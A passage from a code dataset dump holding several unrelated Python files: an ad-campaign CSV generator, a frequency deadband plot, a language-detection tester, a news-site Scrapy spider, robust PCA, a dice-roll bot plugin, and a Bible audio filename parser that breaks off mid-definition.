seedString is not None:\r\n output.write(seedString + \"\\r\\n\")\r\n n += 1\r\n else:\r\n continue\r\n if not passUser:\r\n print(\"%d (%.4f%%)\" %(n, 100*n/prev) )\r\n output.close()\r\n if returnSeed:\r\n return toReturn\r\n else:\r\n return n\r\n\r\ndef genContent(templates, skag, strategy):\r\n content = []\r\n patternToSearch = '##.*##'\r\n patternToSearch = re.compile(patternToSearch)\r\n for template in templates:\r\n if template[6] == strategy:\r\n ad = []\r\n for i in range(len(template)-1):\r\n temp = template[i]\r\n for field in range(len(skag[\"seed\"])):\r\n if skag[\"seed\"][field] == '':\r\n continue\r\n for function in [\"u\", \"l\", \"t\", \"s\", \"\"]:\r\n pattern = \"##%s%d##\" %(function,field+1)\r\n sWord = skag[\"seed\"][field].replace(\"+\",\"\")\r\n if function == \"u\":\r\n temp = temp.replace(pattern, sWord.upper())\r\n elif function == \"l\":\r\n temp = temp.replace(pattern, sWord.lower())\r\n elif function == \"t\":\r\n temp = temp.replace(pattern, sWord.title())\r\n elif function == \"s\":\r\n if len(sWord) < 3:\r\n sigla = sWord.upper()\r\n else:\r\n if sWord == \"fortaleza\":\r\n sigla = \"ce\"\r\n else:\r\n complete_field = sWord.split(\" \")\r\n sigla = \"\"\r\n for word in complete_field:\r\n if word in conectors:\r\n continue\r\n sigla += word[0].upper()\r\n temp = temp.replace(pattern, sigla)\r\n else:\r\n temp = temp.replace(pattern, sWord)\r\n ad.append(temp)\r\n\r\n if len(ad[2]) > 80:\r\n print(\"\\tAtenção! 'Descrição' do criativo para %s excede 80 caracteres.\" %skag[\"adg_name\"])\r\n print(\"\\t\\t%s\" %ad[2])\r\n good = True\r\n for field in ad:\r\n if patternToSearch.search(field):\r\n good = False\r\n print(\"\\tAtenção! Criativo para %s contém padrão não substituído. Ignorando.\" %skag[\"adg_name\"])\r\n print(\"\\t\\t%s\" %field)\r\n break\r\n if good:\r\n content.append(ad)\r\n return content\r\n\r\ndef fixedCombination(campaigns, keywords):\r\n out_filename = input(\"Digite o nome do arquivo de saída (output.csv): \")\r\n if out_filename == \"\":\r\n out_filename = \"output.csv\"\r\n try:\r\n output = open(out_filename, \"w\", encoding=\"utf-16-le\")\r\n except IOError:\r\n print(\"Erro ao abrir o arquivo de saída %s. 
Talvez ele esteja aberto em outro programa?\" %out_filename)\r\n return None\r\n\r\n writeCSVEntry(output, output_hdr)\r\n for c in campaigns:\r\n print(c)\r\n initCampaing(c, output)\r\n for entry in keywords:\r\n adg_name = entry[1]\r\n initAdgroup(c, adg_name, output)\r\n writeKeywordEntry(c, adg_name, entry[0], output)\r\n output.close()\r\n\r\ndef associate(camps, adg, n_key, n_max = 3000, keyword_filename = \"_temp_genKeywords.csv\"):\r\n\r\n out_filename = input(\"Digite o nome do arquivo de saída (output.csv): \")\r\n if out_filename == \"\":\r\n out_filename = \"output.csv\"\r\n\r\n try:\r\n output = open(out_filename, \"w\", encoding=\"utf-16-le\")\r\n except IOError:\r\n print(\"Erro ao abrir o arquivo de saída %s. Talvez ele esteja aberto em outro programa?\" %out_filename)\r\n return None\r\n\r\n try:\r\n keywords_file = open(keyword_filename, \"r\", encoding=\"utf-16-le\")\r\n except IOError:\r\n print(\"Erro ao abrir o arquivo temporário %s\" %keyword_filename)\r\n return None\r\n\r\n writeCSVEntry(output, output_hdr)\r\n\r\n for c in camps:\r\n initCampaing(c, output)\r\n for a in adg:\r\n initAdgroup(c, a, output)\r\n\r\n for c in camps:\r\n print(c)\r\n keywords_file.seek(0,0)\r\n for a in adg:\r\n print(\"\\t\" + a)\r\n i = 0\r\n while i < n_max and i < n_key:\r\n k = keywords_file.readline().replace(\"\\r\", \"\").replace(\"\\n\",\"\")\r\n print(\"\\t\\t\" + k)\r\n writeKeywordEntry(c, a, k, output)\r\n i += 1\r\n\r\n output.close()\r\n\r\ndef associateSKAG(c, skags, templates):\r\n c_list = c.split(\"-\")\r\n defult_fname = \"%s %s %s.csv\" %(c_list[2].upper(), c_list[3].title(), c_list[4])\r\n out_filename = input(\"Digite o nome do arquivo de saída (%s): \" %defult_fname)\r\n if out_filename == \"\":\r\n out_filename = defult_fname\r\n\r\n try:\r\n output = open(out_filename, \"w\", encoding=\"utf-16-le\")\r\n except IOError:\r\n print(\"Erro ao abrir o arquivo de saída %s. Talvez ele esteja aberto em outro programa?\" %out_filename)\r\n return None\r\n\r\n writeCSVEntry(output, output_hdr)\r\n\r\n initCampaing(c, output)\r\n for skag in skags:\r\n strat = c.split(\"-\")[3]\r\n ads = genContent(templates, skag, strat)\r\n if len(ads) > 0:\r\n initAdgroup(c, skag[\"adg_name\"], output)\r\n writeKeywordEntry(c, skag[\"adg_name\"], skag[\"keyword\"], output)\r\n for ad in ads:\r\n writeAdEntry(c, skag[\"adg_name\"], ad, output)\r\n else:\r\n print(\"Ad Group %s (%s) não contém anúncios válidos. 
Pulando.\" %(skag[\"adg_name\"], skag[\"keyword\"]))\r\n\r\n output.close()\r\n\r\ndef initCampaing(c, output, dailybudget = 10.0):\r\n to_output = [k for k in output_template]\r\n to_output[output_map[\"Campaign\"]]=c\r\n to_output[output_map[\"Campaign Daily Budget\"]] = \"%.2f\" %dailybudget\r\n to_output[output_map[\"Campaign Type\"]] = \"Search Network only\"\r\n to_output[output_map[\"Networks\"]] = \"Google search;Search Partners\"\r\n to_output[output_map[\"Languages\"]] = \"pt\"\r\n to_output[output_map[\"Bid Strategy Type\"]] = \"Manual CPC\"\r\n to_output[output_map[\"Enhanced CPC\"]] = \"Enabled\"\r\n to_output[output_map[\"Ad rotation\"]] = \"Optimize for clicks\"\r\n to_output[output_map[\"Delivery method\"]] = \"Standard\"\r\n to_output[output_map[\"Targeting method\"]] = \"Location of presence or Area of interest\"\r\n to_output[output_map[\"Exclusion method\"]] = \"Location of presence or Area of interest\"\r\n to_output[output_map[\"DSA targeting source\"]] = \"Google\"\r\n to_output[output_map[\"Flexible Reach\"]] = \"[]\"\r\n to_output[output_map[\"Campaign Status\"]] = \"Enabled\"\r\n writeCSVEntry(output, to_output)\r\n\r\ndef initAdgroup(c, a, output, cpc = 0.9, cpm = 5.0):\r\n to_output = [k for k in output_template]\r\n to_output[output_map[\"Campaign\"]]=c\r\n to_output[output_map[\"Ad Group\"]]=a\r\n to_output[output_map[\"Max CPC\"]]=\"%.2f\" %cpc\r\n to_output[output_map[\"Max CPM\"]]=\"%.2f\" %cpm\r\n to_output[output_map[\"CPA Bid\"]]=\"%.2f\" %(0.0)\r\n to_output[output_map[\"Flexible Reach\"]]=\"[]\"\r\n to_output[output_map[\"Targeting optimization\"]]=\"Disabled\"\r\n to_output[output_map[\"Ad Group Type\"]]=\"Default\"\r\n writeCSVEntry(output, to_output)\r\n","sub_path":"generatorUtil.py","file_name":"generatorUtil.py","file_ext":"py","file_size_in_byte":14418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"496999096","text":"\"\"\" Attempt at deadband algorithm and plot \"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport psltdsim as ltd\n\n# For agent use:\n# init input: (mirror, parentAgent) dbtype, db, alpha, beta. \n# Checks BAdict for settings, calculates r3\n# step input: delta_w (R can be found via attached parentAgent)\n# step output delta_w Reff\n\n# 10/6/19 - modified to use agents for testing.\n# 10/7/19 Adjusted to make just make plots\n\n# Knowns\nR = 0.05\ndb = 0.036 # deadband [Hz]\nfBase = 60.0\ndbPu = db/fBase\ndbPu2 = .0166/fBase # Reduced deadband\nalpha = dbPu2 # Start of deadband\nbeta = dbPu # return to original R\n\n# Shifted deadband calc\nR2 = R-dbPu2\n\n# 'Compount R' Calc\n# crosses original slope line at beta\nR3 = -(alpha-beta)/(beta/R)\n\n# beta where A1 = A2... 
seems unusable\nbeta2 = np.roots([1, -alpha, -.5*db**2, .5*(db**2*alpha-(1/R)**2)])\n\n\n# Simulation Vars\nfRange = np.arange((1-4*dbPu),(1+4*dbPu),dbPu/50.0) \nu = np.zeros_like(fRange)\nu0 = np.zeros_like(fRange)\nu1 = np.zeros_like(fRange)\nu2 = np.zeros_like(fRange)\nr =np.zeros_like(fRange)\nr1 =np.zeros_like(fRange)\n\nndx = 0\n\nfor f in fRange:\n delta_w = 1.0-f\n\n ## No Deadband\n u0[ndx] = delta_w\n\n ## Step deadband\n if abs(delta_w) < (db/fBase):\n delta_w = 0\n\n u[ndx] = delta_w\n\n ## Shifted Deadband\n delta_w2 = 1.0-f\n # simple step deadband\n if abs(delta_w2) <= (dbPu2):\n delta_w2 = 0\n # Shift the w to edge of deadband\n elif f < 1:\n delta_w2 -= dbPu2\n else:\n delta_w2 += dbPu2\n\n u1[ndx]= delta_w2\n\n ## Compound R\n delta_w3 = 1.0-f\n # standard deadband using alpha as db limit\n if abs(delta_w3) <= (alpha):\n delta_w3 = 0\n r[ndx] = R\n # Shift the w to edge of deadband if less than beta, select R\n else:\n if f<1 and abs(delta_w3) < beta:\n delta_w3 -= alpha\n r[ndx] = R3\n elif f>1 and abs(delta_w3) < beta:\n delta_w3 += alpha\n r[ndx] = R3\n else:\n r[ndx] = R\n\n # Note: w and r un-altered if past beta\n u2[ndx]= delta_w3\n\n ndx += 1\n\n#print(fRange)\n#print(u)\nfig, ax = plt.subplots()\n# Testing of output (i.e input to gain of Mbase and sum pref)\nax.plot(fRange*fBase, u0/R,ls='-', label =r'No Deadband', color =[0, 0, 0])\nax.plot(fRange*fBase, u/R, ls='--', label =r'Step Deadband ($db_1$)', color =[.7,.7,.7])\nax.plot(fRange*fBase, u1/R2,ls=':', label =r'No-Step Deadband ($db_2$)', color =[0,1,0])\nax.plot(fRange*fBase, u2/r, ls='-.', label =r'Non-Linear Droop Deadband ($\\alpha, \\beta$)', color =[1,0,1])\n\n#plt.plot(fRange*fBase, u1/R2,ls=':', label =r'Ramp Deadband ($db_2$)')\nax.annotate(r'$\\alpha$', xy=((1+alpha)*fBase, 0.005), xytext=((1+alpha)*fBase, -.018),\n arrowprops=dict(color=[0, 0, 0, 0.25], arrowstyle='-'),\n horizontalalignment='center'\n )\nax.annotate(r'$\\beta$', xy=((1+beta)*fBase, 0.005), xytext=((1+beta)*fBase, -.018),\n arrowprops=dict(color=[0, 0, 0, 0.25], arrowstyle='-'),\n horizontalalignment='center'\n )\nax.annotate(r'$db_1$', xy=((60-db), -0.005 ), xytext=((60-db), .018),\n arrowprops=dict(color=[0, 0, 0, 0.25], arrowstyle='-'),\n horizontalalignment='center'\n )\nax.annotate(r'$db_2$', xy=((1-alpha)*fBase, -0.005 ), xytext=((1-alpha)*fBase, .018),\n arrowprops=dict(color=[0, 0, 0, 0.25], arrowstyle='-'),\n horizontalalignment='center'\n )\n\nx1 = fBase-2*db\nx2 = fBase+2*db\nplt.xlim(x1, x2)\nplt.ylim(-.025,.025)\nplt.grid(True)\nplt.title('Comparison of Deadband Options')\nplt.xlabel('Frequency [Hz]')\nplt.ylabel(r'PU MW Change [$M_{Base}]$')\nplt.legend()\n\nfig.set_dpi(150)\nfig.set_size_inches(9*.7, 4.5*.85)\nfig.tight_layout()\nprintFigs = True\nif printFigs: plt.savefig('db.pdf', dpi=300)\nplt.show(block = True)\nplt.pause(0.00001)\n\n","sub_path":"tests/pyDeadband/pyDeadbandPLOT3.py","file_name":"pyDeadbandPLOT3.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"372272077","text":"import cld2full\nimport yaml\n\nimport argparse\nimport random\n\nNUM_LINES = 20000 # number of lines to test\n\n### FUNCTIONS ###\ndef get_correct_lang(text, lang):\n\treturn cld2full.detect(text)[2][0][1] == lang\n### FUNCTIONS ###\n\np = argparse.ArgumentParser(description=\"cld2 testing system\")\np.add_argument('-c', '--config', required=True, help='config file')\n\nargs = p.parse_args()\nconfig = yaml.load(open(args.config))\n\nif 
'coverage' not in config:\n\tconfig['coverage'] = {}\n\nlangs = [lang for lang in config['langs']]\nlangs.sort() # i like sorted languages\n# in this case they make life easier\n\nfor lang in langs:\n\tif lang in config['coverage']:\n\t\tcontinue # we already tested this\n\n\tcount = 0\n\tbad_lines = []\n\tfilename = config['langs'][lang]\n\n\tif not filename[-5:] == \".norm\":\n\t\tprint(\"WARNING: Corpus for language %s has not been normalized.\" % lang)\n\n\t# generate a list of random numbers\n\tnum_lines = 0\n\twith open(filename) as f:\n\t\tfor line in f:\n\t\t\tnum_lines += 1\n\n\tif num_lines < NUM_LINES:\n\t\t# iterate through all\n\t\tprint(\"WARNING: Wikipedia corpus text is less than %d. Results may be inaccurate.\" % NUM_LINES)\n\t\tselect_lines = range(num_lines)\n\telse:\n\t\t# pick NUM_LINES lines from range\n\t\tselect_lines = random.sample(xrange(num_lines), NUM_LINES)\n\t\tselect_lines.sort()\n\n\twith open(filename) as f:\n\t\ti = 0\n\t\tj = 0\n\t\tfor line in f:\n\t\t\t# check if it's selected.\n\t\t\tif i == select_lines[j]:\n\t\t\t\ti += 1\n\t\t\t\tj += 1 # advance to the next line number\n\t\t\t\tif j >= len(select_lines):\n\t\t\t\t\tbreak # we finished going through all the lines\n\t\t\telse:\n\t\t\t\ti += 1\n\t\t\t\tcontinue\n\n\t\t\tif get_correct_lang(line, lang):\n\t\t\t\tcount += 1\n\t\t\telse:\n\t\t\t\tbad_lines.append(line)\n\n\t\tcoverage = float(count)/len(select_lines)\n\t\tconfig['coverage'][lang] = coverage\n\n\t\tprint(\"%s: %d/%d %f\" % (lang, count, len(select_lines), coverage))\n\t\tif len(bad_lines) > 0 and not count == 0:\n\t\t\tlines = random.sample(bad_lines, 20)\n\t\t\tfor line in lines:\n\t\t\t\tprint(\"\\t%s\" % line.strip())\n\t\tif coverage > 0.8:\n\t\t\tprint(\"** HIGH ACCURACY\")\n\t\telif coverage > 0.5:\n\t\t\tprint(\"** MEDIUM ACCURACY\")\n\t\telif coverage == 0.0:\n\t\t\tprint(\"** NOT SUPPORTED\")\n\t\telse:\n\t\t\tprint(\"** LOW ACCURACY\")\n\t\tprint(\"\")\n\n\t\twith open(args.config, 'w') as yaml_file:\n\t\t dump = yaml.dump(config, default_flow_style=False)\n\t\t yaml_file.write(dump)\n\nprint(\"All languages have been tested.\")","sub_path":"apertium-tools/lang-identify/lang-test/lang-test.py","file_name":"lang-test.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"192549495","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n# scrapy runspider slate_spider.py -o info.json\nimport urlparse\nimport scrapy\nimport json as json\n\nfrom slate.items import SlateItem\n\nfrom HTMLParser import HTMLParser\n\nclass MLStripper(HTMLParser):\n def __init__(self):\n self.reset()\n self.fed = []\n def handle_data(self, d):\n self.fed.append(d)\n def get_data(self):\n return ''.join(self.fed)\n\ndef strip_tags(html):\n s = MLStripper()\n s.feed(html)\n return s.get_data()\n\n\nclass SlateSpider(scrapy.Spider):\n name = \"slate\"\n start_urls = [\"http://www.slate.fr\"]\n\n def parse(self, response):\n \n for h in response.css(\"article > a::attr('href')\"):\n \n h = urlparse.urljoin(response.url, h.extract())\n \n\n yield scrapy.Request(h, callback=self.parsePage)\n \n \n def parsePage(self, response):\n \t\n for sel in response.css('body'):\n item = SlateItem()\n item['titre'] = u'{}'.format(sel.css('h1::text').extract()[0])\n item['sousTitre'] = u'{}'.format(sel.css('.hat::text').extract()[0]) \n \n item['content'] = u\"\";\n\n for p in sel.css('.main_content > p'):\n\n item['content']+=strip_tags(p.extract())\n \n yield item\n 
\n","sub_path":"tal/projet/slate/slate/spiders/slate_spider.py","file_name":"slate_spider.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"77552269","text":"\"\"\"\nPaths and other configuration properties.\n\"\"\"\n\nimport contextlib\nimport os\n\n# Path to the Mass-Training-Description (csv):\nMASS_TRAIN_DESCRIPTION_PATH = r'CBIS-DDSM\\mass_case_description_train_set.csv'\n\n# *Immediate* parent directory of the cases directories:\nDATASET_PATH = r'CBIS-DDSM\\Train\\Mass'\n\n# These files are created by the scripts. No need to modify these:\nwith contextlib.suppress(FileExistsError):\n os.mkdir('metadata')\nDESCRIPTIONS_PATH = os.path.join('metadata', 'mammograms_descriptions.csv')\nABNORMALITIES_PATH = os.path.join('metadata', 'abnormalities.json')\nAUGMENTED_DB_PATH = os.path.join('metadata', 'augmented_db.json')\n","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"550195068","text":"\nimport os\nimport numpy as np\nfrom numpy.linalg import norm\nfrom numpy.linalg import svd as npsvd\nimport time\nfrom scipy.ndimage import imread\n\n\ndef pcp(M, delta=1e-7, maxiter=500):\n\n shape = M.shape\n lam = np.max(shape) ** -0.5\n mu = 0.25 * np.prod(shape) / np.sum(np.abs(M))\n\n stop_cond = delta * norm(M, ord='fro')\n\n iter = 0\n S = np.zeros(shape)\n Y = np.zeros(shape)\n\n while iter < max(maxiter, 1):\n\n U, s, Vt = npsvd(M - S + Y/mu)\n s = shrink(s, 1/mu)\n rank = np.sum(s > 0.0)\n U, s, Vt = U[:, :rank], s[:rank], Vt[:rank, :]\n\n L = np.dot(U, np.dot(np.diag(s), Vt))\n S = shrink(M - L + Y/mu, lam/mu)\n\n Yterm = M - L - S\n Y += mu * (Yterm)\n\n if norm(Yterm, ord='fro') < stop_cond:\n break\n\n iter += 1\n\n if iter >= maxiter:\n print('does not converge in pcp')\n\n return L, S\n\n\ndef shrink(s, tau):\n sgn = np.sign(s)\n s_= np.abs(s) - tau\n s_[s_ < 0.0] = 0.0\n return sgn * s_\n\n\nif __name__ == \"__main__\":\n\n i = '10'\n os.chdir('/Users/a/downloads/CroppedYale/YaleB' + str(i))\n files = os.listdir()\n files = [file for file in files if 'pgm' in file]\n files = files[1:]\n print(files)\n storage = np.zeros((len(files), 192*168))\n\n idx = 0\n\n for file in files:\n storage[idx, :] = imread(file).flatten()\n idx += 1\n\n st = time.time()\n L, S = pcp(storage)\n print(time.time() - st)","sub_path":"rpca.py","file_name":"rpca.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"33382169","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\n\nimport shlex\n\n\nif __name__ == '__main__':\n import sys\n sys.path.append('../..')\n sys.path.append('../../libs')\n\nfrom plugins.parsingplugintemplate import ParsingPluginTemplate\n\nimport libs.janteparse as janteparse \n\n\nclass RollPlugin(ParsingPluginTemplate):\n \"\"\"\n roll is the default command for this plugin.\n\n roll\n Returns a number between 1 and n. 
","sub_path":"rpca.py","file_name":"rpca.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"33382169","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\n\nimport shlex\n\n\nif __name__ == '__main__':\n    import sys\n    sys.path.append('../..')\n    sys.path.append('../../libs')\n\nfrom plugins.parsingplugintemplate import ParsingPluginTemplate\n\nimport libs.janteparse as janteparse\n\n\nclass RollPlugin(ParsingPluginTemplate):\n    \"\"\"\n    roll is the default command for this plugin.\n\n    roll\n        Returns a number between 1 and n. n is configured in the settings file and is 6 by default.\n    roll \n        Returns a number between 1 and the specified integer.\n    roll help\n        Shows help.\n\n    roll ...\n        Picks a random word\n    \"\"\"\n    def __init__(self, bot):\n\n        super().__init__(bot, command=\"roll\", description=\"Returns a diceroll.\")\n\n        self.parser = janteparse.JanteParser(description='Random number generation!', prog=\"roll\", add_help=False)\n        group = self.parser.add_mutually_exclusive_group()\n\n        group.add_argument('-h', '--help', action='store_true', required=False, help=\"Shows this helpful message.\")\n        group.add_argument('-n', '--newline', action='store_true', required=False, help=\"Splits at newlines instead of at spaces and quotation marks.\")\n\n        self.parser.add_argument('items', nargs=\"*\", help=\"\"\"Items to roll between. If it is of type integer, roll a number between 1 and the supplied integer.\n        If it is a list of items, pick one of the items. The items can be separated by spaces or by using quotation marks. If the -n option is used, items are split up by newlines.\"\"\")\n\n    def parse(self, message):\n        # Parse twice, to check for the -n option before shlexing\n        try:\n            args = self.parser.parse_args(message.get_text().split(\" \"))\n        except Exception as e:\n\n            return janteparse.ArgumentParserError(\"\\n{}\".format(e))\n\n        if args.newline:\n            items = message.get_text().split(\"\\n\")#[1:]\n            items[0] = \" \".join(items[0].split(\" \")[1:])\n            if items[0].strip() == \"\" and len(items) == 1:\n                items = []\n        else:\n            try:\n                args = self.parser.parse_args(shlex.split(message.get_text()))\n\n            except Exception as e:\n\n                return janteparse.ArgumentParserError(\"\\n{}\".format(e))\n            items = args.items\n        if __debug__:\n            self.log(\"Alternatives: {}\".format(items))\n        if args.help:\n            return self.parser.format_help()\n\n        if len(items) > 1 or args.newline:\n            if len(items) == 0:\n                return RuntimeError(\"Can't pick between 0 items. {}\".format(self.parser.format_usage()))\n            return random.choice(items)\n\n        if len(items) == 0:\n            d = int(6) # default to 6\n        else:\n            try:\n                d = int(items[0])\n            except ValueError:\n                return ValueError(\"Must be an integer. 
\\\"{}\\\" is a {}.\".format(items[0], type(items[0])))\n\n roll = random.randint(1,d)\n return str(roll)\n","sub_path":"plugins/roll/roll.py","file_name":"roll.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"393858621","text":"# FilenameParser.py\n\nimport io\nimport sys\nimport re\nfrom Lookup import *\nfrom SQLUtility import *\n\nclass Filename:\n\n\tdef __init__(self):\n\t\tself.book = \"\"\n\t\tself.chap = \"\"\n\t\tself.verseStart = \"\"\n\t\tself.verseEnd = \"\"\n\t\tself.bookSeq = \"\"\n\t\tself.fileSeq = \"\"\n\t\tself.name = \"\"\n\t\tself.title = \"\"\n\t\tself.usfx2 = \"\"\n\t\tself.damid = \"\"\n\t\tself.unknown = []\n\t\tself.type = \"\"\n\t\tself.file = \"\"\n\t\tself.errors = []\n\t\tself.template = None\n\n\n\tdef setBookSeq(self, bookSeq):\n\t\tself.bookSeq = bookSeq\n\t\tif not bookSeq.isdigit():\n\t\t\tif not bookSeq[0] in {\"A\", \"B\"}:\n\t\t\t\tself.errors.append(\"non-number bookSeq\")\n\n\n\tdef setFileSeq(self, fileSeq):\n\t\tself.fileSeq = fileSeq\n\t\tif not fileSeq.isdigit():\n\t\t\tself.errors.append(\"non-number fileSeq\")\n\n\n\t# Should be used before set chapter\n\tdef setBookName(self, name, chapterMap):\n\t\tself.name = name\n\t\tbookId = Lookup().usfmBookId(name)\n\t\tif bookId == None:\n\t\t\tself.errors.append(\"usfm not found for name: %s\" % (name))\n\t\telse:\n\t\t\tself.setBook(bookId, chapterMap)\n\n\n\tdef setBook(self, bookId, chapterMap):\n\t\tself.book = bookId\n\t\tif bookId not in chapterMap.keys():\n\t\t\tself.errors.append(\"usfm code %s is not valid\" % (bookId))\n\n\n\tdef setUSFX2(self, usfx2, chapterMap, usfx2Map):\n\t\tself.usfx2 = usfx2\n\t\tbookId = usfx2Map.get(usfx2)\n\t\tself.setBook(bookId, chapterMap)\n\n\n\tdef setChap(self, chap, chapterMap):\n\t\tself.chap = chap\n\t\tif chap.lower() == \"end\":\n\t\t\treturn\n\t\tif not chap.isdigit():\n\t\t\tself.errors.append(\"non-number chap\")\n\t\telif self.book != None:\n\t\t\tchapter = chapterMap.get(self.book)\n\t\t\tif chapter != None and int(chap) > int(chapter):\n\t\t\t\tself.errors.append(\"chap too large: %s for %s\" % (chap, self.book))\n\n\n\tdef setVerseStart(self, verseStart):\n\t\tself.verseStart = verseStart\n\t\tif not verseStart.isdigit():\n\t\t\tself.errors.append(\"non-number verse start: %s\" % (verseStart))\n\n\n\tdef setVerseEnd(self, verseEnd):\n\t\tself.verseEnd = verseEnd\n\t\tif not verseEnd.isdigit():\n\t\t\tif not verseEnd[:-1].isdigit() or not verseEnd[-1] == \"r\":\n\t\t\t\tself.errors.append(\"non-number verse end: %s\" % (verseEnd))\n\n\n\tdef setTitle(self, title):\n\t\tself.title = title\n\n\n\tdef setDamid(self, damid):\n\t\tself.damid = damid\n\n\n\tdef addUnknown(self, unknown):\n\t\tself.unknown.append(unknown)\n\n\n\tdef getUnknown(self, index):\n\t\treturn self.unknown[index] if index < len(self.unknown) else \"\"\n\n\n\tdef setType(self, typ):\n\t\tself.type = typ\n\n\n\tdef numErrors(self):\n\t\treturn len(self.errors)\n\n\n\tdef setFile(self, template, filename):\n\t\tself.file = filename\n\t\tfileOut = []\n\t\tmiscIndex = 0\n\t\tfor item in template.parts:\n\t\t\tif item == \"book_seq\":\n\t\t\t\tfileOut.append(self.bookSeq)\n\t\t\telif item == \"file_seq\":\n\t\t\t\tfileOut.append(self.fileSeq)\n\t\t\telif item == \"book_name\":\n\t\t\t\tfileOut.append(self.name.replace(\"_\",\"\"))\n\t\t\telif item == \"book_id\":\n\t\t\t\tfileOut.append(self.book)\n\t\t\telif item == \"usfx2\":\n\t\t\t\tfileOut.append(self.usfx2)\n\t\t\telif item == 
\"chapter\":\n\t\t\t\tif not template.optionalChapter or self.chap != \"0\":\n\t\t\t\t\tfileOut.append(self.chap)\n\t\t\telif item == \"verse_start\":\n\t\t\t\tfileOut.append(self.verseStart)\n\t\t\telif item == \"verse_end\":\n\t\t\t\tfileOut.append(self.verseEnd)\n\t\t\telif item == \"title\":\n\t\t\t\tfileOut.append(self.title.replace(\"_\",\"\"))\n\t\t\telif item == \"damid\":\n\t\t\t\tfileOut.append(self.damid)\n\t\t\telif item == \"type\":\n\t\t\t\tfileOut.append(self.type)\n\t\t\telif item == \"misc\":\n\t\t\t\tfileOut.append(self.getUnknown(miscIndex))\n\t\t\t\tmiscIndex += 1\n\t\tfilenameOut = \"\".join(fileOut).replace(\"_\",\"\")\n\t\tif filenameOut != filename.replace(\"_\",\"\").replace(\"-\",\"\").replace(\".\",\"\"):\n\t\t\tself.errors.append(\"Mismatch %s\" % (filenameOut))\n\n\n\tdef print(self):\n\t\tprint(self.bookSeq, self.fileSeq, self.book, self.chap, self.name, self.damid, self.type, self.file, self.errors)\n\n\nclass FilenameTemplate:\n\n\tdef __init__(self, name, parts, specialInst):\n\t\tself.name = name\n\t\tself.parts = parts\n\t\tself.numParts = len(parts)\n\t\tself.namePosition = None\n\t\tself.chapterPosition = None\n\t\tfor index in range(len(parts)):\n\t\t\tpart = parts[index]\n\t\t\tif part not in {\"book_id\", \"chapter\", \"verse_start\", \"verse_end\", \n\t\t\t\t\"book_seq\", \"file_seq\", \"book_name\", \"usfx2\", \"title\", \"damid\", \"type\", \"misc\"}:\n\t\t\t\tprint(\"ERROR: filenameTemplate part %s is not known\" % (part))\n\t\t\t\tsys.exit()\n\t\t\tif part in {\"book_name\", \"title\"}:\n\t\t\t\tself.namePosition = index\n\t\t\tif part == \"chapter\":\n\t\t\t\tself.chapterPosition = index\n\t\tself.hasProblemDamId = (\"damid_front_clean\" in specialInst)\n\t\tself.verseEndClean = (\"verse_end_clean\" in specialInst)\n\t\tself.optionalChapter = (\"optional_chapter\" in specialInst)\n\t\tself.splitPosition2 = (\"split_position2\" in specialInst)\n\t\tself.scanForBookId = (\"scan_for_book_id\" in specialInst)\n\n\nclass FilenameParser:\n\n\tdef __init__(self):\n\t\tself.parsedList = []\n\t\tself.unparsedList = []\n\t\tself.audioTemplates = (\n\t\t\t##FilenameTemplate(\"audio0\", (\"type\",), ()),\n\t\t\t## {bookseq}___{chap}_{bookname}____{damid}.mp3 B01___01_Matthew_____ENGGIDN2DA.mp3\n\t\t\tFilenameTemplate(\"audio6\", (\"book_seq\", \"chapter\", \"book_name\", \"damid\", \"type\"), (\"damid_front_clean\",)),\n\t\t\t## {misc}_{misc}_Set_{fileseq}_{bookname}_{chap}_{verse_start}-{verse_end}.mp3 Nikaraj_P2KFTNIE_Set_051_Luke_21_1-19.mp3\n\t\t\tFilenameTemplate(\"audio1\", (\"misc\", \"misc\", \"misc\", \"file_seq\", \"book_name\", \"chapter\", \"verse_start\", \"verse_end\", \"type\"), ()),\n\t\t\t## {fileseq}_{USFM}_{chap}_{versestart}-{verseend}_SET_{unknown}___{damid}.mp3 audio/SNMNVS/SNMNVSP1DA16/052_GEN_027_18-29_Set_54____SNMNVSP1DA.mp3\n\t\t\tFilenameTemplate(\"audio2\", (\"file_seq\", \"book_id\", \"chapter\", \"verse_start\", \"verse_end\", \"misc\", \"misc\", \"damid\", \"type\"), ()),\n\t\t\t## {lang}_{vers}_{bookseq}_{bookname}_{chap}_{versestart}-{verseend}_{unknown}_{unknown}.mp3 audio/SNMNVS/SNMNVSP1DA/SNM_NVS_01_Genesis_041_50-57_SET91_PASSAGE1.mp3\n\t\t\tFilenameTemplate(\"audio3\", (\"misc\", \"misc\", \"book_seq\", \"book_name\", \"chapter\", \"verse_start\", \"verse_end\", \"misc\", \"misc\", \"type\"), ()),\n\t\t\t## {bookseq}___{fileseq}_{bookname}_{chap}_{startverse}_{endverse}{name}__damid.mp3 audio/PRSGNN/PRSGNNS1DA/B01___22_Genesis_21_1_10BirthofIsaac__S1PRSGNN.mp3\n\t\t\tFilenameTemplate(\"audio4\", (\"book_seq\", 
